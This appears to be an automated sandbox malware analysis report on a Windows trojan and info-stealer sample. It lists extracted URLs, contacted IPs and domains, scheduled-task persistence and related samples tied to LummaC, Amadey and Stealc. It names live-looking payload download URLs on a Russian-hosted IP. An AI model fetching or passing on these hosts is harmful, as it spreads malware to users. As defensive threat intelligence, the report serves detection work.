                                                                                                                        https://sci.libertyreserve.com/skotes.exe, 00000006.00000002.2970891358.0000000000788000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, zudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, zudFSfy.exe, 00000007.00000002.2478294311.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmp, kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://31.41.244.11/files/1293295511/kz8ZdyP.exeiskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.fontbureau.com/designersGzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.fontbureau.com/designers/?zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.founder.com.cn/cn/bThezudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/mgravell/protobuf-netJzudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2579288387.0000000003BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ocsp.sectigo.com0skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designers?zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.come56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://31.41.244.11/files/x3team/random.exedskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://31.41.244.11/files/x3team/random.exeIskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tiro.comzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://31.41.244.11/files/1293295511/zudFSfy.exeshqos.dllskotes.exe, 00000006.00000002.2970891358.0000000000748000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://api.libertyreserve.com/beta/xml/history.aspxSkz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.goodfont.co.krzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.typography.netDzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://github.come56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.galapagosdesign.com/staff/dennis.htmzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/mgravell/protobuf-netizudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://stackoverflow.com/q/11564914/23354;zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://contoso.com/powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://31.41.244.11/files/x3team/random.exeiskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.fonts.comzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.sandoll.co.krzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.sakkal.comzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://api.libertyreserve.com/beta/xml/accountname.aspxkz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://31.41.244.11/files/unique3/random.exeoskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.2686734514.0000000005905000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.fontbureau.comzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sectigo.com/CPS0skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://31.41.244.11/files/lolz/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                            unknown
                                                                                                                                                                            http://raw.githubusercontent.comde56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://31.41.244.11/files/1293295511/kz8ZdyP.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                              unknown
                                                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/mgravell/protobuf-netzudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://github.comde56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://31.41.244.11/iles/x3team/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://31.41.244.11/files/burpin1/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://api.libertyreserve.com/beta/xml/zudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://crl.mipowershell.exe, 00000010.00000002.2697865269.0000000007357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.founder.com.cn/cnzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://31.41.244.11/files/x3team/random.exe76-sskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://ion=v4.5powershell.exe, 00000010.00000002.2669231961.000000000302A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://stackoverflow.com/q/2152978/23354zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                185.215.113.43
                                                                                                                                                                                                unknownPortugal
                                                                                                                                                                                                206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                104.21.66.85
                                                                                                                                                                                                aspecteirs.latUnited States
                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                104.21.64.80
                                                                                                                                                                                                grannyejh.latUnited States
                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                20.233.83.145
                                                                                                                                                                                                github.comUnited States
                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                185.199.111.133
                                                                                                                                                                                                raw.githubusercontent.comNetherlands
                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                31.41.244.11
                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                IP
                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                Analysis ID:1578014
                                                                                                                                                                                                Start date and time:2024-12-19 06:07:08 +01:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 11m 46s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                Number of analysed new started processes analysed:54
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@79/57@5/7
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 54%
                                                                                                                                                                                                • Number of executed functions: 234
                                                                                                                                                                                                • Number of non-executed functions: 82
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 184.28.90.27
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                00:09:01API Interceptor142181x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                00:09:14API Interceptor1x Sleep call for process: zudFSfy.exe modified
                                                                                                                                                                                                00:09:22API Interceptor1x Sleep call for process: kz8ZdyP.exe modified
                                                                                                                                                                                                00:09:37API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                00:09:50API Interceptor67x Sleep call for process: e56fffc2ce.exe modified
                                                                                                                                                                                                00:10:00API Interceptor4x Sleep call for process: 1be411a3d2ff4d5e9f89420f2740d28f.exe modified
                                                                                                                                                                                                00:10:08API Interceptor1x Sleep call for process: 641d24797a.exe modified
                                                                                                                                                                                                05:08:05Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                05:10:06Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                104.21.66.85file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                  104.21.64.80file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                    rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                      CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                        tdMnK5A1pe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                            Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                  random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    raw.githubusercontent.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                                                                    pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                                                    Lu4421.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                                                                    Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                                                    rbqHSouklL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                                                    github.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                    • 140.82.113.4
                                                                                                                                                                                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    ORDER-2412180Y6890PF57682456HTVC789378909759..jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    IAK4Rn3bfO.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                    ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                    • 140.82.121.3
                                                                                                                                                                                                                    aspecteirs.latfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                    • 104.21.66.85
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                    • 104.21.66.85
                                                                                                                                                                                                                    grannyejh.latfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                    • 172.67.179.109
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    NHEXQatKdE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.179.109
                                                                                                                                                                                                                    CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    tdMnK5A1pe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.179.109
                                                                                                                                                                                                                    D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                    • 172.67.179.109
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                    • 172.67.179.109
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                    • 104.21.67.146
                                                                                                                                                                                                                    1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 141.101.96.239
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                    • 104.21.12.88
                                                                                                                                                                                                                    https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 172.67.26.92
                                                                                                                                                                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.16.123.96
                                                                                                                                                                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                    • 104.21.64.80
                                                                                                                                                                                                                    vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.17.25.14
